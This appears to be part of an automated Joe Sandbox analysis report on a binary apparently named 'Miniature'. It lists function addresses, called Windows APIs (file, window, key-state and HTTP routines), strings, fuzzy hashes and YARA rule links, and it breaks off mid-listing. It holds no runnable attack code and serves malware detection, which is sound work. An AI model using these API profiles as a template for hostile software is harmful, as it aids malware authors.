                                                                                                                                                                                                                                                                                            Function 00C42FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43007
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43013
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4301E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43029
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43034
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4303F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4304A
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43055
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43060
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4306E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 93605c6832d3908774a570426d44235c8c1e0ccfe64752672cd234904211a543
                                                                                                                                                                                                                                                                                            • Instruction ID: c82065011bf255ba49abd9680d8079329d4ec311a0fa9b58fcf33401afd344f8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93605c6832d3908774a570426d44235c8c1e0ccfe64752672cd234904211a543
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35114276910108AFCB01EF94C942DDD3BA5FF09350BD145A5FA089B222DA32EA51EB90
                                                                                                                                                                                                                                                                                            Function 00C12AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C12AF9
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00C12B98
                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00C12D7D
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C53A1B
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C53A80
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C53AAD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                            • Opcode ID: 460032311bb21763e637e28dbe6b15757ea4f0889cb4e02bfa832db4c077033a
                                                                                                                                                                                                                                                                                            • Instruction ID: 8bd98865d1c4ccc522b99dd977bab3191bcedfe8e13528fb59e1dbb11c125fcf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 460032311bb21763e637e28dbe6b15757ea4f0889cb4e02bfa832db4c077033a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41D1AD79701252CFCB19EF54C855BA9F7A0BF05745F1002ADE84A6B251CB30AEA7EF44
                                                                                                                                                                                                                                                                                            Function 00C88835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C889F2
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88A06
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C88A30
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C88A4A
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88A5C
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88AA5
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C88AF5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: 65e2a2e30f3e482629f9d52a1c02991b1ad58e110e28d4ad7725c55739e294e3
                                                                                                                                                                                                                                                                                            • Instruction ID: 11ed5a588f085d5d515fae72988a3f14dd2ad655086326622a91a0cd04db270d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65e2a2e30f3e482629f9d52a1c02991b1ad58e110e28d4ad7725c55739e294e3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B81A1719043059BCB24FF14C444ABAB3E8BF85318F98481EF895D7690DF34EA49DB96
                                                                                                                                                                                                                                                                                            Function 00C17447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00C174D7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17567: GetClientRect.USER32(?,?), ref: 00C1758D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17567: GetWindowRect.USER32(?,?), ref: 00C175CE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17567: ScreenToClient.USER32(?,?), ref: 00C175F6
                                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00C56083
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C56096
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C560A4
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C560B9
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C560C1
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C56152
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                            • Opcode ID: c90aa363e170739b1418bfe12567667a46ec9b6622154d384b6a41afed7bb117
                                                                                                                                                                                                                                                                                            • Instruction ID: cba59c05da91048484fc824c82a23f1591f5284fc069c0f73e44da82e6a99c28
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c90aa363e170739b1418bfe12567667a46ec9b6622154d384b6a41afed7bb117
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9271BB39500205DFCF258F64C884AFE7BB5FF4A322F144269ED665B2A6C73189C8EB54
                                                                                                                                                                                                                                                                                            Function 00CA955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetCursorPos.USER32(?), ref: 00C119E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: ScreenToClient.USER32(00000000,?), ref: 00C119FE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000001), ref: 00C11A23
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
                                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00CA95C7
                                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 00CA95CD
                                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 00CA95D3
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00CA966E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CA9681
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00CA975B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                            • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                            • Opcode ID: 425b8aad968b8a9b4e01902c4a581c424a498ad797d40a6e286e11a7269ceb00
                                                                                                                                                                                                                                                                                            • Instruction ID: f957e1a24e9dae6d77b873c42d8795cc0636587585c60bda27e30542758c8f56
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 425b8aad968b8a9b4e01902c4a581c424a498ad797d40a6e286e11a7269ceb00
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A518C71104345AFD704EF24CC96FAE77E4FB85718F400A29F996972E2CB709944EB52
                                                                                                                                                                                                                                                                                            Function 00C8CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8CCB7
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8CCDF
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8CD0F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8CD67
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C8CD7B
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C8CD86
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: 23ab64a045d613e48186ee5bd3566f5f7c1dfd38b36f336d8d0bf72d0703d0a6
                                                                                                                                                                                                                                                                                            • Instruction ID: 2242c3d91c68e9e12219caf21210c0cb9969fbd0a161cc8df04ca3c47db2b0c1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23ab64a045d613e48186ee5bd3566f5f7c1dfd38b36f336d8d0bf72d0703d0a6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D315AB1500208AFD721BF6598C8BAB7BBCEB45748B10452AF456D7650DB34EE049BB4
                                                                                                                                                                                                                                                                                            Function 00C7A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C555AE,?,?,Bad directive syntax error,00CADCD0,00000000,00000010,?,?), ref: 00C7A236
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C555AE,?), ref: 00C7A23D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C7A301
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                            • Opcode ID: c3338202ea2699561f5aca998532b8e9591e76d36c4b56764115fb25522181c5
                                                                                                                                                                                                                                                                                            • Instruction ID: f5c549181b92dc6a2f29800f52521c0862983ce98e1a41e96f4b68e271e4f792
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3338202ea2699561f5aca998532b8e9591e76d36c4b56764115fb25522181c5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A21413180421EEBCF12AF90CC06EEE7B75BF19704F444469F61A661A2EB719A58FB11
                                                                                                                                                                                                                                                                                            Function 00C729EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C729F8
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C72A0D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C72A9A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                            • Opcode ID: 6bea7d6d728315bcd53e7b072a73de4cedc35524a1edd64f5bc6f799a7369391
                                                                                                                                                                                                                                                                                            • Instruction ID: c4a1d200e0b024d4d5935c3dc75d0c5985df572de34112aa6136ae5dcc5d33b2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bea7d6d728315bcd53e7b072a73de4cedc35524a1edd64f5bc6f799a7369391
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6111E976244307BAFA286621DC07EAB7BACDF15734F204027F609E51D1FB616941B514
                                                                                                                                                                                                                                                                                            Function 00C17567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C1758D
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C175CE
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C175F6
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C1773A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C1775B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6af7736dbd7534900bd1518886e06e8163f944b0940e30a2ec8018a104e1cca4
                                                                                                                                                                                                                                                                                            • Instruction ID: eb919655ba48cd6979c5ad5b6438217715bfa131b2d20554196ae9fbd80189a0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af7736dbd7534900bd1518886e06e8163f944b0940e30a2ec8018a104e1cca4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16C18D3890464ADFDB10CFA9C940BEDB7F1FF19314F14851AE8A5E3250DB34AA91EB64
                                                                                                                                                                                                                                                                                            Function 00C4D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 432a86c30c6c4a2fc5404bc2583be86f6ca8073b16a28d51cde447b9d24ae1cb
                                                                                                                                                                                                                                                                                            • Instruction ID: c37418a46d656da309589f951699ae19334ada3850aa7963584426b6f7c29ea1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 432a86c30c6c4a2fc5404bc2583be86f6ca8073b16a28d51cde447b9d24ae1cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5612571A04301AFDB36BF74DC82BAE7BA4BF01320F0405ADFD56AB291D6759E009791
                                                                                                                                                                                                                                                                                            Function 00CA5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CA5C24
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00CA5C65
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CA5C6B
                                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CA5C6F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA79F2: DeleteObject.GDI32(00000000), ref: 00CA7A1E
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA5CAB
